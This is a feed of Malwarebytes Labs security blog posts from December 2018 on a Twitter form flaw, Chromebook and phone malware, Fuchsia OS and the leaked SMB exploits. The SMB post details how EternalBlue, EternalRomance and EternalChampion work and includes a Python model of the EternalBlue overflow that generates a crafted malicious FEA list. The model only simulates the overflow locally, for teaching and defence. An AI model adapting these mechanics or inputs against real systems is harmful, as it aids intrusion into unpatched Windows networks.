Techie Feeds

Flaw in Twitter form may have been abused by nation states

Malwarebytes - Wed, 12/19/2018 - 16:00

Twitter announced in a blog post on Monday that they discovered and addressed a security flaw on one of their support forms. The discovery was made on November 15 — more than a month ago — and was promptly fixed the next day. From the Twitter blog on this issue:

We have become aware of an issue related to one of our support forms, which is used by account holders to contact Twitter about issues with their account. This could be used to discover the country code of people’s phone numbers if they had one associated with their Twitter account, as well as whether or not their account had been locked by Twitter.

They go on to add:

Importantly, this issue did not expose full phone numbers or any other personal data. We have directly informed the people we identified as being affected. We are providing this broader notice as it is possible that other account holders we cannot identify were potentially impacted.

Country codes, take me home

While a country code isn’t treated or considered by many as sensitive information, some warn that it is enough to clue in attackers on whether a registered mobile number (with country code) is associated with a Twitter account. This means that cybercriminals could find the true country locations of Twitter users. This could be dangerous for those in countries with freedom of speech–related privacy concerns.

Twitter is currently investigating the possibility that the flaw may have been abused by potential nation-state actors, particularly from IP addresses associated with Saudi Arabia and China.

As if this weren’t enough of a headache for the social media giant, Peerzada Fawaz Ahmad Qureshi, an independent security researcher who goes by @Fawaz on Twitter, has stepped forward to disclose that he had reported the flaw to Twitter via HackerOne, a bug bounty platform, more than two years ago. Twitter took no action, however, deeming the bug as non-critical before marking the report an “informative” one.

Wait! That’s not all

This announcement comes hot on the heels of a Trend Micro report about malicious Twitter users abusing the social media platform to stealthily communicate with malware using steganography, the method of hiding messages in images. In this case, the malicious actors have hidden commands in memes found in every nook and cranny of Twitter—hiding-in-plain-sight at its finest.

This isn’t the first time Twitter has been used as a comms hub for malware. Back in 2009, a DIY botnet kit was discovered that brought social media–controlled infection hijinks to the masses, allowing malware authors with rudimentary skills to use Twitter to send commands.

Stock, drop, and roll

Outside of bot action, the news of Twitter’s investigation triggered a dramatic drop in the company’s stock share prices. It promises to be a rollercoaster-ride ending to 2018 for those trying to keep both Twitter and its users safe from harm.

If you use the social media platform and are worried about a potential breach, Twitter’s advice is simply: do nothing. While these mishaps may have been close calls instead of direct hits, one hopes that in 2019, we’ll all be a little more proactive—and a lot more reassured—about using our favorite portals and communication channels safely.

The post Flaw in Twitter form may have been abused by nation states appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Yes, Chromebooks can and do get infected

Malwarebytes - Wed, 12/19/2018 - 15:00

As a Mac malware specialist, I’ve seen more than my share of folks saying “Macs don’t get viruses” over the years. I’ve seen and experienced first-hand that this isn’t true—even on iOS, where despite having tight, built-in security, iPhones are still capable of getting infected by rare malware. I suppose that I shouldn’t be surprised, then, when I hear someone claim that “viruses on Chrome OS don’t exist.”

Although it’s certainly true that viruses—the class of malware that spreads itself by injecting malicious code into other processes—really don’t exist to a significant degree these days, even on Windows, it’s definitely not true that any platform is impervious to malware. Chromebooks are no exception.

No admin permissions, no problem, right?

Despite popular belief, Chromebooks don’t actually run Android. They run a system called Chrome OS, where all Android apps are run in emulation. There are certainly some security improvements in Chrome OS over Android. For example, the powerful device administrator permissions on Android are unavailable on Chrome OS, limiting the amount of “bad” that malware can do.

So, if malware can’t get those permissions, it’s not serious, right? Wrong!

If I had a dime for every time I heard someone minimize some new piece of Mac malware because it couldn’t get root permissions, I’d be able to take my wife out to a nice dinner. But these permissions aren’t always relevant. Bad guys can get away with a lot of bad stuff, including stealing user data, phishing for passwords, hijacking CPU power for the purpose of a botnet or cryptomining, and more, all without admin permissions. The same is true on Chrome OS.

Android malware = Chromebooks malware

Let’s take a look at a few examples of Android malware that would work perfectly well on Chrome OS, as they don’t require anything Chrome OS doesn’t provide.

First, consider the Buzzfeed story of apps from Chinese companies that engaged in ad fraud. These apps didn’t require anything more than permission to access a number of different bits of user data. Admittedly, there was no legitimate reason those apps had to access some of that data, but when installing a new app, people are prone to click past any requests just to get the app working.

These apps don’t really do much harm to the user, of course. The primary target of the fraud are the advertising networks. But that doesn’t make it okay, and any time an app like this is “wildly over-permissioned,” as the Buzzfeed article puts it, there’s the chance of an update to the app resulting in more malicious behavior.

Image credit: Buzzfeed

A more malicious example comes in the form of some malicious cryptocurrency wallet apps found on Google Play. These apps would not require any particular device permissions, as their sole purpose is to trick the user into storing cryptocurrency in the fake wallets supported by these apps. In reality, any cryptocurrency stored cannot be withdrawn later. The perpetrator essentially stole money from the victims—and they could easily do the same to Chromebook users.

Image credit: Lukas Stefanko

Of course, affected users would have to be using cryptocurrency, so one could argue that they’d be more tech-savvy and less likely to fall for such scams. That’s not necessarily the case, but okay, let’s take a look at another example.

Consider the threat from fake antivirus software. This is software that poses as an antivirus, but provides none of the actual benefits. As described on our own blog, a family of fake antivirus software has been floating around since 2013. At one point, it was charging users $1.99 for the privilege of scanning the device, but covered up the fact that this was $1.99 per week!

This is the kind of scam many people routinely fall for and it’s universal—device, OS, and platform agnostic. Any major computer system will be afflicted with this scourge, with the exception of iOS, and even that was once plagued by fake antivirus scams. (In fact, that’s the only kind that could exist on iOS, due to the impossibility of scanning the system in any way.) If I had a dime for every person I’ve encountered who has been tricked out of their money by scammers like these, I’d have enough to take my wife out for dinner and a show!

Mac and Chrome OS parallels

For a long time, people have said that Macs don’t get viruses. People have also said that the Mac App Store is the safest place to download apps. The same has been said of Chrome OS. Unfortunately, neither is actually true. Apps from the Mac App Store are sandboxed, just like the ones from Google Play on Chrome OS.

That hasn’t stopped criminals from making lots of money off the Mac App Store, however. I’ve documented many Mac App Store apps over the last few years that have defrauded users in a variety of ways. None of them have required root permissions, or exploits, or any other advanced malware techniques. Yet they have stolen user data and scammed users out of their money. I’ve worked hard to identify these apps, ensure that they are detected by Malwarebytes for Mac, and get them removed from the App Store when possible.

There should be no illusions that Chrome OS is any different; it is not. The same tricks that are so successful on macOS can be equally effective on Chrome OS, and Malwarebytes has top-notch mobile malware researchers who work hard every day to keep Android and Chromebook users safe from such threats.

But does my Chromebook really need antivirus?

Since there is, definitively, already malware that can affect Chromebooks, it’s reasonable to install antivirus software on a Chromebook. And since Chromebooks are increasing in popularity, it’s also reasonable to assume cybercriminals will continue to develop more malware to get their piece of the pie. Once Pandora’s Box has been opened for a device, operating system, browser, or other platforms, we’ve never once seen the bad guys back away from it.

However, there is a catch to all of this. And to discover the catch, you must first answer this question: Does your Chromebook support Google Play?

Not all Chromebooks do. If yours does not, it cannot download malware through Google Play, much less third-party app stores, because it cannot download any apps at all. In such a case, you could use the free Malwarebytes browser extension beta for protection against browser-based attacks such as phishing or malicious websites and tech support scams, and that would be the most security you’d need (at the moment).

For those with Google Play, sure, you could simply try being careful about what you download. However, anyone can potentially be tricked by just the right malicious app with a large number of fake 5-star ratings, or just the right scam. If that concerns you, Malwarebytes for Android (and Chrome OS) is here to help.

The post Yes, Chromebooks can and do get infected appeared first on Malwarebytes Labs.


All the reasons why cybercriminals want to hack your phone

Malwarebytes - Tue, 12/18/2018 - 16:00

When people think of hacking, most imagine desktop computers, laptops, or perhaps even security cameras. However, in recent years, cybercriminals have expanded their repertoire to include smartphones, too. Here are 10 reasons why they may be looking to hack your phone.

1. To infect it with malware

Many smartphone users assume they can stay safe from malware and other threats by installing antivirus apps on their phones and being extra careful about the websites they visit. They typically don’t expect their phones to have malware out of the box. However, researchers showed that’s what happened with more than three dozen Android models, typically from lesser-known brands.

The phones had Trojan malware installed on them before they reached users, and the culprit appeared to be a software vendor in Shanghai that was a shared reseller for a brand of antivirus software. Although it’s not clear what the hackers wanted to do after infecting the phones, the malware was particularly hard to remove. Often, it involved fully reinstalling the operating system.

2. To eavesdrop on calls

People use their phones to speak to loved ones, discuss business plans, talk about their travels—all manner of personal, intimate content. So, it’s not surprising that criminals would want to break in and listen, whether to case a target or simply for voyeuristic pleasure. But how do they do it?

There’s a flaw in the US cellular exchange system, a vulnerability in the SS7 signaling protocol, which allows hackers to listen to calls, read texts, and see users’ locations after learning their phone numbers. Even though US agencies know about the issue, they haven’t taken decisive action to fix it, leaving Americans’ phone privacy at risk.

3. To steal money

Ransomware attacks cause headaches for computer users by making the affected machines lock up or holding files hostage until people pay the ransom to restore access. Even then, paying doesn’t guarantee a return to proper functionality. Ransomware doesn’t only affect computers, though. There’s a recent trend of mobile ransomware, which often originates from malicious, third-party apps.

In one example, a third-party app promised to optimize the Android system but actually tricked people into transferring $1,000 from their PayPal accounts. The login process was legitimate, so it wasn’t a phishing attempt. However, once people logged in, a Trojan automated the PayPal transfer.

4. To blackmail people

The crime of blackmail isn’t new, but threat actors recognize that the small computer in people’s pockets and purses likely has more personal information stored in it than a desktop or laptop. And they are able to first cut people off from accessing their phones before then threatening to leak the information they find.

Criminals may start the hack after obtaining some personal information about a victim that is available on the black market due to a previous, unrelated breach. They then use that information to contact the victim’s phone company and pose as the user, saying that they want to transfer the number to a new phone. Phone companies often provide such services and can automatically transfer information, including phone numbers, to a new device. The trouble is that in this case, the old phone still works but it’s useless to the person who owns it.

After hackers take over a phone in this way, the stage is set for more serious crimes—blackmail among them. If a person had essential numbers in their phone not backed up elsewhere, they could easily feel pressured to cave in to hackers’ demands to avoid worse consequences.

5. To damage your phone

Hackers feel they’ve accomplished a goal by causing chaos for victims. One way to do that is to make the phone overheat and ultimately ruin it. Security researchers warned that hackers could break into a phone’s processor and use it for mining cryptocurrency. In addition to making the phone slow down, it can also cause the phone to get too hot or even blow up!

There are many reliable cooling devices used in cell phones for temperature management, even “intelligent” temperature management solutions that heat up your phone’s battery when it’s too cool and cool it down when it’s too hot. However, if hackers have their way, even those normally sufficient internal components could fail to keep the device cool enough.

One type of the cryptomining malware called Loapi is often hidden in apps that appear as downloadable games. Security researchers ran a test and found it actually made a phone battery bulge due to excessive heat after only two days.

6. To threaten national security

Countless analysts have chimed in to say that President Trump’s alleged use of insecure mobile devices could help foreign adversaries glean information about the United States that could threaten the nation or at least give information about the president’s intended actions.

In 2018, Billy Long, a Republican congressman, had his mobile phone and Twitter account hacked. Cybercriminals know that one of the primary ways politicians interact with followers is through social media.

Besides threatening national security more directly, these hackers could erode the trust politicians have built with their audiences, especially with fake posts that seem to come from the genuine account owners.

Cybercriminals know that by hacking the mobile phones and social media accounts of politicians, they are contributing to the overall public opinion that politicians cannot be trusted. Instead of looking to the source for information, users might instead look for news via sources that are even less reliable or strategically crafted to spread fake news.

7. For fun or notoriety

Some hackers get a thrill by successfully pulling off their attacks. Hacking is a source of entertainment for them, as well as an ego boost. If money isn’t the primary motivator for cybercriminals, then notoriety might be a close second. Hackers may get into phones because it’s a newer challenge that might require more cutting-edge malware development techniques. Ultimately, many cybercriminals want approval from others in the industry and desire their respect.

8. To get payment information

E-wallets, which store payment information inside smartphone apps so people don’t have to carry real credit or debit cards, are convenient. However, their rising popularity has given hackers another reason to target phones.

Often, cybercriminals entice people to download fake mobile payment apps (of course believing they are real). Then, once people enter their payment information, hackers have the information needed to charge transactions to the cards.

9. Because so many people use it

Since hackers want their attacks to have significant payoffs, they know they can up their chances of having a major impact by targeting smartphones. Information published by the Pew Research Center shows 95 percent of Americans own smartphones. To put that in perspective, only 35 percent of the population did in 2011, when the organization first conducted a survey on smartphone ownership.

Also, different research from another organization reveals that mobile Internet usage is overtaking desktop time. People are becoming increasingly comfortable with using their smartphones to go online, browse, and even shop. As such, no matter what kind of hack cybercriminals orchestrate, they can find plenty of victims by focusing on smartphone users.

10. Because it’s an easy target

Research shows that mobile apps have rampant security problems. This gives criminals ample opportunity to infiltrate insecure apps rather than the phones themselves.

In one case, about 40 of the top 50 shopping apps had at least a few high-level security vulnerabilities that allowed hackers to see personal information or deceive users by luring them to dangerous apps that were copies of the originals.

Further research about problematic dating apps found that many of them give third parties access to unencrypted data through vulnerable software development kits (SDKs). Hackers know some apps achieve hundreds of thousands, or even millions, of downloads. If they can break into them, they’ll get fast access to the phones that have those apps installed and the people who use them.

How to stay protected

These examples show that hackers have a myriad of reasons to hack phones and even more ways to make it happen. One easy way to protect against attacks is to avoid third-party app stores and only download content from the phone’s legitimate app stores, such as Google Play or iTunes. However, threat actors can penetrate those platforms, too, and many an infected or rogue app has made its way through.

It’s also smart to keep tabs on phone statistics, such as battery life and the number of running apps. If those deviate too much from the norm, that’s a sign hackers may be up to no good in the background.

Running a mobile antivirus scan at least monthly, or installing an always-on cybersecurity program is another good strategy, but only if the application comes from a trustworthy source, such as the vendor’s official site.

Instead of being overeager to download new apps, people should ideally exercise caution and only do so if numerous sources of feedback indicate they are free from major security flaws. Some app development companies are in such a hurry to get to the market with their latest offerings that they do not make security a priority.

Besides these more specific tips, it’s essential for people to be highly aware of how they interact with their phones. For example, strange pop-ups or redirects in a phone’s browser, or random icons appearing without having downloaded a new app could indicate problems, and individuals should not assume that everything’s okay. When in doubt, it’s best to stop using the phone and get some answers—before hackers learn all they need to know about you.

The post All the reasons why cybercriminals want to hack your phone appeared first on Malwarebytes Labs.


Mobile Menace Monday: Is Fuchsia OS the end of Android?

Malwarebytes - Mon, 12/17/2018 - 20:10

It’s no secret that every year Google announces a new Android version. This time though, recent Google documents state that the next major Android version will be Android Q and not Android 9.1 Pie.

In parallel, Google is also developing an operating system called Fuchsia that’s supposedly going to replace Android in the near future. People were expecting to see a statement from Google about Fuchsia, or Andromeda (its previous codename), back in October 2017. But that never happened. Instead, we get to speculate for another year about whether or not it’s here to replace Android, or is simply a playground for developers. Here’s what we know so far.

A brief history of Google Fuchsia

Fuchsia is a capability-based operating system with a user interface, and it has the ability to scale up to larger devices like laptops and computers. Also, it can support ARM, MIPS, and x86 processors.

It first popped up on GitHub in August 2016 with zero fanfare or explanation from Google. Unlike Android and Chrome OS, Google Fuchsia is not based on Linux, but rather Google’s own new microkernel.

In May 2017, an experimental OS leaked. However, calling it an “OS” might be a misnomer. Basically, its system UI was up and running on top of Android and functioning like an app, but nothing else worked. Later, one of the developers working on the project teased that this was not just a dumping ground but a real project. This led to speculation that Google had larger plans for it.

Not long after, at the beginning of 2018, Google released news that the Fuchsia team picked the Chrome OS-powered Google Pixelbook as a supported device. A couple of curious users rushed out to test this claim. They confirmed that they were able to run Fuchsia on these Google Pixelbooks. This was one more big step forward. Since then, we’ve heard nothing more. However, we do know the components of Fuchsia, and they look promising.

The Fuchsia layer cake

Let’s take a closer look under the hood of this potential future Google OS. There are four distinct layers that hold the whole operating system together. Google uses a layer cake model when describing the organization of Fuchsia code, and we will not deviate from this scheme. So, let’s talk about each layer separately and in detail.

It all starts with Zircon (formerly Magenta), the Fuchsia operating system’s new microkernel, which is based on LK (Little Kernel), a small operating system intended for embedded devices. Zircon is the foundation on which the rest of Fuchsia is built, and it primarily handles access to hardware and communication between software.

The next layer, which sits atop Zircon, is called Garnet. Garnet consists of services needed for the OS, such as its network and graphics, together with the package manager and device drivers. Some of them are worth mentioning here: Escher, a Vulkan-based graphics renderer with specific support for volumetric soft shadows; Amber, Fuchsia’s update system; and Xi Editor, a modern editor with a backend written in Rust.

The next layer up, Peridot, mostly handles Fuchsia’s modular runtime app design for composition. What this means is that almost everything that exists in Fuchsia, such as software and even system files, is delivered in packages. And Fuchsia packages can be made up of smaller components instead of large, all-in-one programs. One of the major components of Peridot is Ledger. Ledger is a storage system for Fuchsia, and it provides and manages separate data stores for apps/components across devices, syncing everything through a cloud provider.

Topaz is the top layer and the one you’ll most likely interact with. It’s similar to Android’s pre-installed (factory) applications like messaging, contacts, phone, camera, and music. The most important part is the introduction of Flutter support. Flutter is a software development kit allowing cross-platform development abilities for Fuchsia, Android, and iOS. Flutter produces apps based on Dart, an open-source, scalable programming language with robust libraries and runtimes for building web, server, and mobile apps. Because the Flutter software development kit offers cross-platform opportunities, users are able to install parts of Fuchsia on Android devices.

In addition, Google already announced Flutter 1.0 is out. The first stable release of Google’s UI toolkit for creating native experiences for iOS and Android from a single codebase is available at

Final thoughts

Let’s sum it up. Here’s what we know so far:

  • Google Fuchsia is a new OS in development from Google, but is still a ways off from completion.
  • The OS is based on the Zircon kernel, which makes it highly scalable and secure.
  • Flutter, a software development kit offering cross-platform opportunities, is already out.

Although Google said Fuchsia is just “one of many experimental open-source projects” at the company, we can already see a potential OS brewing that could replace Android. Microsoft once tried to create something similar under the code name Singularity, but they totally failed. That’s why there’s a big question mark over whether Fuchsia will actually replace Android and Chrome OS, or peter out like some of its predecessors.

Also, let’s remember that Android was hanging around for about five years before it launched in a real product. If Fuchsia follows a similar path, and everything goes well, maybe we can expect a consumer product sometime around 2020. Right now, it’s still a giant maybe. So if you’re feeling stressed about learning a new OS, there is still plenty of time to adjust—save the panicking for later in 2019.

The post Mobile Menace Monday: Is Fuchsia OS the end of Android? appeared first on Malwarebytes Labs.


A week in security (December 10 – 16)

Malwarebytes - Mon, 12/17/2018 - 17:58

Last week on Labs, we took a look at some new Mac malware, a collection of various scraped data dumps, the protection of power grids, and how bad actors are using SMB vulnerabilities.

Other cybersecurity news
  • Millions affected by Facebook photo API bug: An issue granted third-party apps more access to photos than should normally be granted, including images uploaded but not published. (Source: Facebook)
  • Bomb threats may be a hoax: An email in circulation urging ransom payments in Bitcoin lest bombs across the US be detonated may well be a fake, according to US law enforcement. (Source: The Register)
  • Man jailed for fraud offenses: A man in the UK has been jailed for taking part in fraudulent activities. The main point of interest is surely the spectacular device he built. (Source: Met Police)
  • Another Google Plus bug: For six days, developers were able to access profile data not made public by the users. (Source: Google)
  • Windows 10 data collection: Reddit users complained Windows 10 is grabbing a certain kind of data even with the setting disabled. (Source: How-To Geek)
  • Taylor Swift concert tracks stalkers with facial recognition software: At a recent event, cutting-edge tech was deployed to ensure the crowds were free of potential troublemakers. (Source: Rolling Stone)
  • Password disasters of 2018: A tongue-in-cheek look at some of the more spectacular password mishaps seen rumbling into view this year. (Source: Help Net Security)
  • Android Trojan steals from PayPal accounts: Even with 2FA enabled, it might not be enough to keep your account balance safe. (Source: ESET)
  • Character recognition collects URLs in YouTube videos: Theoretically private data in hidden videos may not be as private as you’d first hoped. (Source: Austin Burk’s blog)
  • Traveller data left lying around on USB sticks: Border agents aren’t being quite as careful as they should be where potentially sensitive passenger data is concerned. (Source: Naked Security)

Stay safe, everyone!

The post A week in security (December 10 – 16) appeared first on Malwarebytes Labs.


How threat actors are using SMB vulnerabilities

Malwarebytes - Fri, 12/14/2018 - 16:00

Some of the most devastating ransomware and Trojan malware variants depend on vulnerabilities in the Windows Server Message Block (SMB) to propagate through an organization’s network. Windows SMB is a protocol used by PCs for file and printer sharing, as well as for access to remote services.

A patch was released by Microsoft for the SMB vulnerabilities in March 2017, but many organizations and home users have still not applied it. So now, unpatched systems let in threats that take advantage of these vulnerabilities, helping active malware campaigns spread like Californian wildfire.

SMB vulnerabilities have been so successful for threat actors that they’ve been used in some of the most visible ransomware outbreaks and sophisticated Trojan attacks of the last two years. In fact, our product telemetry has recorded 5,315 detections of Emotet and 6,222 of TrickBot in business networks—two Trojan variants that are using the SMB vulnerabilities—in the last 30 days alone.

What makes them so effective?

What makes some malware so widespread is the way in which it propagates. While massive spam campaigns only render a few victims that actually pay off, a worm-like infection that keeps spreading itself requires little effort for multiplying returns. And that’s exactly what the SMB vulnerabilities allow their payloads to do: spread laterally through connected systems.

For example, WannaCry ransomware (also known as WannaCrypt), which used one of the SMB vulnerabilities, was launched in May 2017, yet the infection continues to expand. Below is the graph that shows our telemetry for Ransom.WannaCrypt for the month of November 2018.

It’s been more than 1.5 years, and WannaCry continues to proliferate, thanks to the sheer number of unpatched machines connected to infected networks.

How did this come about?

At the moment, there are three exploits in the wild that use SMB vulnerabilities. These exploits have been dubbed EternalBlue (used by WannaCry and Emotet), EternalRomance (NotPetya, Bad Rabbit, and TrickBot), and EternalChampion. There is a fourth exploit called EternalSynergy, but we have only seen a Proof of Concept (PoC)—nothing has appeared yet in the wild.

All these exploits were leaked by the ShadowBrokers group, who allegedly stole them from the NSA. Less than a month after ShadowBrokers published their “findings,” the first fully functional malware that used the EternalBlue exploit, WannaCry, was found in the wild.

Since then, multiple large-scale malware attacks have relied on the SMB vulnerabilities to penetrate organizations’ networks, including the NotPetya and Bad Rabbit ransomware campaigns in 2017, and now the Emotet and TrickBot Trojan attacks, which have been ongoing through the third and fourth quarter of 2018.

Let’s now take a closer, more technical look at each exploit and how they work.

A bug in the Windows SMB implementation’s conversion of File Extended Attributes (FEA) from the OS/2 structure to the NT structure can lead to a buffer overflow in the non-paged kernel pool. This non-paged pool consists of virtual memory addresses that are guaranteed to reside in physical memory for as long as the corresponding kernel objects are allocated.

A buffer overflow is a programming flaw that lets the data written to a reserved memory area (the buffer) go outside of bounds (overflow), allowing it to write data to adjacent memory locations. This means attackers are able to control the content of certain memory locations that they should not be able to access, which attackers then exploit to their advantage. In the case of EternalBlue, they are able to control the content of a heap that has execution permission, which leads to the Remote Code Execution (RCE) vulnerability, or the ability to execute commands on a target machine over the network.
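To make the size arithmetic behind that overflow concrete, here is an added example, written for this edit and not code from the original post or from Windows, that models the conversion in Python. The OS/2 and NT layouts follow the SMB_FEA and FILE_FULL_EA_INFORMATION structures from the SMB specification; the 16-bit store into the 32-bit list-length field models the root cause analysts documented for the EternalBlue bug (CVE-2017-0144), reduced to a pure size calculation so nothing is actually corrupted. The 0x10000 declared length and the entry sizes in malicious_fea_list are constructed values chosen to trigger the mismatch.

```python
import struct

# One OS/2 FEA entry (SMB_FEA): flag (1 byte), name length (1), value length (2),
# then the name with a NUL terminator, then the value. Little-endian throughout.
OS2_FEA_HDR = struct.Struct("<BBH")


def nt_fea_size(name_len, value_len):
    """Size of the converted NT entry (FILE_FULL_EA_INFORMATION): 8-byte header,
    NUL-terminated name, value, rounded up to a 4-byte boundary."""
    return (8 + name_len + 1 + value_len + 3) & ~3


def build_os2_fea_list(entries):
    """Well-formed OS/2 FEA list: ULONG SizeOfListInBytes (counting itself)
    followed by the entries. Constructed input for the demo below."""
    body = b"".join(OS2_FEA_HDR.pack(0, len(n), len(v)) + n + b"\x00" + v
                    for n, v in entries)
    return struct.pack("<I", 4 + len(body)) + body


def size_pass_vulnerable(data):
    """Model of the vulnerable size pass. It sums the NT sizes of the entries that
    fit inside the declared length and stops at the first entry that crosses the
    end. There it shrinks the declared length to that entry's offset, but the
    store is 16 bits wide into a 32-bit field, so the upper half survives."""
    list_len = struct.unpack_from("<I", data, 0)[0]
    off, nt_size = 4, 0
    while off + OS2_FEA_HDR.size <= list_len:
        _flag, nlen, vlen = OS2_FEA_HDR.unpack_from(data, off)
        entry_len = OS2_FEA_HDR.size + nlen + 1 + vlen
        if off + entry_len > list_len:
            list_len = (list_len & 0xFFFF0000) | (off & 0xFFFF)  # WORD store, DWORD field
            break
        nt_size += nt_fea_size(nlen, vlen)
        off += entry_len
    return nt_size, list_len


def convert_pass(data, list_len):
    """Model of the conversion pass: trusts list_len and converts every entry whose
    header lies inside it. Returns the bytes it would write into the NT buffer."""
    off, written = 4, 0
    while off + OS2_FEA_HDR.size <= min(list_len, len(data)):
        _flag, nlen, vlen = OS2_FEA_HDR.unpack_from(data, off)
        written += nt_fea_size(nlen, vlen)
        off += OS2_FEA_HDR.size + nlen + 1 + vlen
    return written


def convert_os2_fea_list_vulnerable(data):
    """(allocated, written): the pool allocation the size pass requests and the
    bytes the conversion pass then writes into it. written > allocated is the overflow."""
    alloc, list_len = size_pass_vulnerable(data)
    return alloc, convert_pass(data, list_len)


def convert_os2_fea_list_hardened(data):
    """Fixed conversion: the declared length must fit the received buffer, every
    entry must lie entirely inside it, and the length field is never narrowed."""
    list_len = struct.unpack_from("<I", data, 0)[0]
    if list_len > len(data):
        raise ValueError("declared list length exceeds received data")
    off, nt_size = 4, 0
    while off < list_len:
        if off + OS2_FEA_HDR.size > list_len:
            raise ValueError("truncated FEA header")
        _flag, nlen, vlen = OS2_FEA_HDR.unpack_from(data, off)
        entry_len = OS2_FEA_HDR.size + nlen + 1 + vlen
        if off + entry_len > list_len:
            raise ValueError("FEA entry crosses the end of the list")
        nt_size += nt_fea_size(nlen, vlen)
        off += entry_len
    return nt_size, nt_size


def is_well_formed(data):
    """True if the hardened converter accepts the list."""
    try:
        convert_os2_fea_list_hardened(data)
        return True
    except ValueError:
        return False


def malicious_fea_list():
    """Constructed list in the shape the exploit relies on: declared as 0x10000
    bytes, filled with valid entries, ending in a header whose value length
    reaches far past the declared end (the value bytes themselves are absent)."""
    entry = OS2_FEA_HDR.pack(0, 1, 0xFF) + b"A\x00" + b"V" * 0xFF   # 261 bytes each
    body = entry * 250                                                # next entry at offset 65254
    body += OS2_FEA_HDR.pack(0, 1, 0xF000) + b"A\x00"                 # claims 61440 value bytes
    declared = 0x10000
    return (struct.pack("<I", declared) + body).ljust(declared, b"\x00")


if __name__ == "__main__":
    alloc, written = convert_os2_fea_list_vulnerable(malicious_fea_list())
    print("vulnerable: allocated %d bytes, conversion writes %d (overflow %d)"
          % (alloc, written, written - alloc))
    print("hardened accepts the same list:", is_well_formed(malicious_fea_list()))
```

The point to take from the model is that the two passes disagree about where the list ends: the size pass stops counting at the oversized entry, but the narrowed length it hands to the conversion pass is larger than the declared one, so the conversion pass happily converts the entry that was never budgeted for.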

EternalRomance

EternalRomance is an RCE attack that exploits CVE-2017-0145 against the legacy SMBv1 file-sharing protocol. Please note that file sharing over SMB is normally used only on local networks, and the SMB ports (TCP 139 and 445) are typically blocked from the Internet by a firewall. However, once an attacker has reached a vulnerable endpoint running SMB, the ability to run arbitrary code in kernel context from a remote location is a serious compromise.

At the core of this exploit is a type confusion vulnerability. Type confusion vulnerabilities are programming flaws that happen when a piece of code does not verify the type of the object that is passed to it before using it. Type confusion can allow an attacker to feed function pointers or data into the wrong piece of code. In some cases, this leads directly to code execution.

In EternalRomance’s case, the type confusion yields an arbitrary heap write, which the exploit combines with a heap spray. Heap spraying is a technique that fills large amounts of memory with attacker-chosen data, so that whatever address the corrupted code later reads or jumps to is likely to land in it. Usually, that data points to (or contains) the start of the actual code the exploit wants to run in order to compromise the system under attack.

After the spray has finished, the exploit uses an info leak in a TRANS_PEEK_NMPIPE transaction. It uses the info leak to determine whether the target is running a 32- or 64-bit version of Windows and to get kernel pointers for various SMB objects.

EternalChampion

The issue exploited by EternalChampion is a race condition in how SMBv1 handles transactions. A race condition, or race hazard, is the behavior of a system where the output depends on the sequence or timing of other uncontrollable events. It becomes a bug when events do not happen in the order the programmer intended. Sometimes these bugs can be exploited when the outcome is predictable and works to the attackers’ advantage.

In SMB, a transaction is a type of request that can span multiple packets. For example, if a request is too large to fit in a single server message block (SMB), a transaction of the appropriate size can be created, and the server stores the data as it is received from multiple SMBs.

This vulnerability is exploited in two ways: first for an information leak, and second for remote code execution. The bug is first exploited to leak pool information via an out-of-bounds read. To do this, a single packet containing multiple SMBs is sent to the server. This packet contains three relevant pieces:

  • A primary transaction request that will immediately be executed.
  • A secondary transaction request that triggers the bug caused by the race condition.
  • Sets of primary transactions that heap spray the pool, with the intention of placing a transaction structure immediately behind the one that tracks the first primary transaction request.

First, a transaction is created that contains the shellcode. This does not start the exploit; it just stages the second-stage payload. Next, a packet is sent that contains multiple SMBs. The packet contains all expected transaction data and execution begins immediately.

The secondary transaction handler copies the secondary transaction request’s data if it fits in the buffer. But because of the race condition, the pointer now points to the stack of the primary transaction request handler’s thread (as opposed to the expected pool buffer). This allows an attacker to write their data directly onto the stack of another thread.

The attacker controls the displacement, so they can choose how much data to copy and where it lands. This lets them precisely overwrite a return address stored on the stack of the primary transaction request handler’s thread, which results in Remote Code Execution.

EternalSynergy

The Proof of Concept for EternalSynergy shows that incoming SMB messages are copied by an initial handler into the corresponding transaction buffer. That handler assumes that the provided address is the beginning of the buffer. During a write transaction, however, the same address is treated as the end of the existing data, and the pointer to the beginning of the buffer is updated accordingly.

This means that an attacker can construct a secondary message in the transaction that points beyond the start of the buffer, resulting in a buffer overflow during the copy.

EternalRocks

Looking for information about these SMB exploits, you may also run into an exploit called EternalRocks. EternalRocks was not included in the ShadowBrokers release, but was instead constructed and discovered later. EternalRocks uses seven of the leaked NSA tools, whereas WannaCry, for example, only used two: EternalBlue and the DoublePulsar kernel backdoor.

Prevention and remediation

Despite the significant power SMB vulnerabilities afford to attackers, there is one simple remedy to prevent them from ever becoming problematic.

Patch your systems.

The exploits found in the wild target Windows versions that predate Windows 10; most work only on Windows 7 and earlier. Microsoft released patches for all of the leaked SMBv1 vulnerabilities in March 2017 under Security Bulletin MS17-010 (covering Windows Vista through Windows 10 and Server 2016), and after WannaCry it even published out-of-band fixes for the unsupported Windows XP and Server 2003. This leaves little-to-no reason for networks to remain vulnerable to these attacks, yet the number of current victims is overwhelming.

By applying the patch released by Microsoft in 2017, all your eternal headaches can magically disappear. Where SMBv1 is not needed (and on a modern network it rarely is), disable it outright and block TCP ports 139 and 445 at the network perimeter, so that a machine the patch rollout missed is not reachable in the first place. For extra measure, we also recommend you patch and update all systems, browsers, and software as soon as possible to shore up any other potential vulnerabilities in the network.

In addition, many cybersecurity solutions, including Malwarebytes Endpoint Protection, offer innovative anti-exploit technology that can block threats such as EternalBlue from ever dropping their payloads and infecting systems.

For example, Malwarebytes’ anti-exploit module detected WannaCry as Ransom.WannaCrypt right from the start. Below, we created a heat map using our telemetry, showing where the infection started and how fast it spread across the globe.

It is for good reason that most cybersecurity guides advise users to patch quickly and keep systems updated. So many of the infections seen today could be avoided with consistent monitoring and basic computer maintenance. Unfortunately, a lot of businesses believe they do not have the time or manpower to follow this advice. But when companies leave their networks unprotected, they compromise the integrity of all of our online experiences—especially when SMB vulnerabilities allow infections to spread so quickly.

Don’t be one of those companies. Get protected and stay updated!

The post How threat actors are using SMB vulnerabilities appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Compromising vital infrastructure: the power grid

Malwarebytes - Thu, 12/13/2018 - 16:00

Where were you when the lights went out? That line became famous after the 1977 blackout in New York City. This power outage was caused by lightning and lasted for up to two days, depending on which part of New York you lived in. While in this case the power grid failure was a freak incident due to faulty backup equipment, it is still famous for the havoc it wreaked throughout the city—including looting and arson—during a time when national morale was already low.

